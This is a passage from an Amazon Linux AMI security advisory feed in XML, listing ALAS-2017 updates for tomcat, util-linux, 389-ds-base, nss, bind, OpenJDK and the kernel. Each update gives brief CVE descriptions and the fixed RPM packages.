release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.53-1.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2017-822</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-822: important priority package update for tomcat7 tomcat8</title><issued date="2017-04-20 06:18:00" /><updated date="2017-04-20 21:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5648:
While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.
1441223:
CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object
CVE-2017-5647:
A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.
1441205:
CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5647" title="" id="CVE-2017-5647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5648" title="" id="CVE-2017-5648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package 
name="tomcat7-docs-webapp" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.43" release="1.70.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-lib-8.0.43-1.70.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-823</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-823: medium priority package update for util-linux</title><issued date="2017-04-27 00:00:00" /><updated date="2017-04-27 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2616:
A race condition was found in the way su handled the management of child processes. A local authenticated attacker could use this flaw to kill other processes with root privileges under specific conditions.
1418710:
CVE-2017-2616 util-linux: Sending SIGKILL to other processes with root privileges via su
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2616" title="" id="CVE-2017-2616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libuuid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuuid-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libblkid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libblkid-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/util-linux-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libmount" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmount-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libblkid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libblkid-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libuuid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuuid-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux-debuginfo" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/util-linux-debuginfo-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="uuidd" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/uuidd-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libmount-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmount-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/util-linux-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libblkid-devel" version="2.23.2" 
release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libblkid-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libuuid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libuuid-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="uuidd" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/uuidd-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libmount-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libmount-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="util-linux-debuginfo" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/util-linux-debuginfo-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libuuid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libuuid-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libblkid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libblkid-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libmount" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libmount-2.23.2-33.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-824</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-824: important priority package update for 389-ds-base</title><issued date="2017-04-27 00:02:00" /><updated date="2017-04-27 19:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2668:
An invalid pointer dereference flaw was found in the way 389-ds-base handled LDAP bind requests. A remote unauthenticated attacker could use this flaw to make ns-slapd crash via a specially crafted LDAP bind request, resulting in denial of service.
1436575:
CVE-2017-2668 389-ds-base: Remote crash via crafted LDAP messages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2668" title="" id="CVE-2017-2668" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="20.50.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-snmp-1.3.5.10-20.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-825</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-825: critical priority package update for nss nss-util</title><issued date="2017-04-27 00:04:00" /><updated date="2017-04-27 19:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5461:
* An out-of-bounds write flaw was found in the way NSS performed certain Base64-decoding operations. An attacker could use this flaw to create a specially crafted certificate which, when parsed by NSS, could cause it to crash or execute arbitrary code, using the permissions of the user running an application compiled against the NSS library.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5461" title="" id="CVE-2017-5461" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1100.html" title="" id="RHSA-2017:1100" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" 
release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-1.0.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-826</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-826: important priority package update for bind</title><issued date="2017-04-27 00:07:00" /><updated date="2017-04-27 19:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3137:
* A denial of service flaw was found in the way BIND handled a query response containing CNAME or DNAME resource records in an unusual order. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
CVE-2017-3136:
* A denial of service flaw was found in the way BIND handled query requests when using DNS64 with the "break-dnssec yes" option. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3136" title="" id="CVE-2017-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3137" title="" id="CVE-2017-3137" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1105.html" title="" id="RHSA-2017:1105" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-827</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-827: medium priority package update for java-1.8.0-openjdk</title><issued date="2017-05-09 23:21:00" /><updated date="2017-05-10 23:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3544:
A newline injection flaw was discovered in the SMTP client implementation in the Networking component in OpenJDK. A remote attacker could possibly use this flaw to manipulate SMTP connections established by a Java application.
1443068:
CVE-2017-3544 OpenJDK: newline injection in the SMTP client (Networking, 8171533)
CVE-2017-3539:
It was discovered that the Security component of OpenJDK did not allow users to restrict the set of algorithms allowed for Jar integrity verification. This flaw could allow an attacker to modify the content of a Jar file that used a weak signing key or hash algorithm.
1443097:
CVE-2017-3539 OpenJDK: MD5 allowed for jar verification (Security, 8171121)
CVE-2017-3533:
A newline injection flaw was discovered in the FTP client implementation in the Networking component in OpenJDK. A remote attacker could possibly use this flaw to manipulate FTP connections established by a Java application.
1443083:
CVE-2017-3533 OpenJDK: newline injection in the FTP client (Networking, 8170222)
CVE-2017-3526:
It was found that the JAXP component of OpenJDK failed to correctly enforce parse tree size limits when parsing an XML document. An attacker able to make a Java application parse a specially crafted XML document could use this flaw to make it consume an excessive amount of CPU and memory.
1443252:
CVE-2017-3526 OpenJDK: incomplete XML parse tree size enforcement (JAXP, 8169011)
CVE-2017-3511:
An untrusted library search path flaw was found in the JCE component of OpenJDK. A local attacker could possibly use this flaw to cause a Java application using JCE to load an attacker-controlled library and hence escalate their privileges.
1443007:
CVE-2017-3511 OpenJDK: untrusted extension directories search path in Launcher (JCE, 8163528)
CVE-2017-3509:
It was discovered that the HTTP client implementation in the Networking component of OpenJDK could cache and re-use an NTLM authenticated connection in a different security context. A remote attacker could possibly use this flaw to make a Java application perform HTTP requests authenticated with credentials of a different user.
1443052:
CVE-2017-3509 OpenJDK: improper re-use of NTLM authenticated connections (Networking, 8163520)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify the content of a JAR file that used a weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3509" title="" id="CVE-2017-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3511" title="" id="CVE-2017-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3526" title="" id="CVE-2017-3526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3533" title="" id="CVE-2017-3533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3539" title="" id="CVE-2017-3539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3544" title="" id="CVE-2017-3544" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.131-2.b11.30.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.131-2.b11.30.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-828</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-828: important priority package update for kernel</title><issued date="2017-05-10 17:06:00" /><updated date="2017-05-10 23:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7618:
A vulnerability was found in crypto/ahash.c in the Linux kernel, which allows attackers to cause a denial of service (an API operation calling its own callback, leading to infinite recursion) by triggering EBUSY on a full queue.
1441093:
CVE-2017-7618 kernel: Infinite recursion in ahash.c by triggering EBUSY on a full queue
CVE-2017-7616:
Incorrect error handling in the set_mempolicy() and mbind() compat syscalls in &#039;mm/mempolicy.c&#039; in the Linux kernel allows local users to obtain sensitive information from uninitialized stack data by triggering failure of a certain bitmap operation.
1441088:
CVE-2017-7616 kernel: Incorrect error handling in the set_mempolicy and mbind compat syscalls in mm/mempolicy.c
CVE-2017-7308:
It was found that the packet_set_ring() function of the Linux kernel&#039;s networking implementation did not properly validate certain block-size data. A local attacker with CAP_NET_RAW capability could use this flaw to trigger a buffer overflow, resulting in the crash of the system. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1437404:
CVE-2017-7308 kernel: net/packet: overflow in check for priv area size
CVE-2017-7187:
The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel allows local users to cause a denial of service (stack-based buffer overflow) or possibly have unspecified other impacts via a large command size in an SG_NEXT_CMD_LEN ioctl call, leading to out-of-bounds write access in the sg_write function.
1434327:
CVE-2017-7187 kernel: scsi: Stack-based buffer overflow in sg_ioctl function
CVE-2017-5967:
The time subsystem in the Linux kernel, when CONFIG_TIMER_STATS is enabled, allows local users to discover real PID values (as distinguished from PID values inside a PID namespace) by reading the /proc/timer_list file, related to the print_timer function in kernel/time/timer_list.c and the __timer_stats_timer_set_start_info function in kernel/time/timer.c.
1422138:
CVE-2017-5967 kernel: Time subsystem allows local users to discover real PID values
CVE-2017-2671:
A race condition leading to a NULL pointer dereference was found in the Linux kernel&#039;s Link Layer Control implementation. A local attacker with access to ping sockets could use this flaw to crash the system.
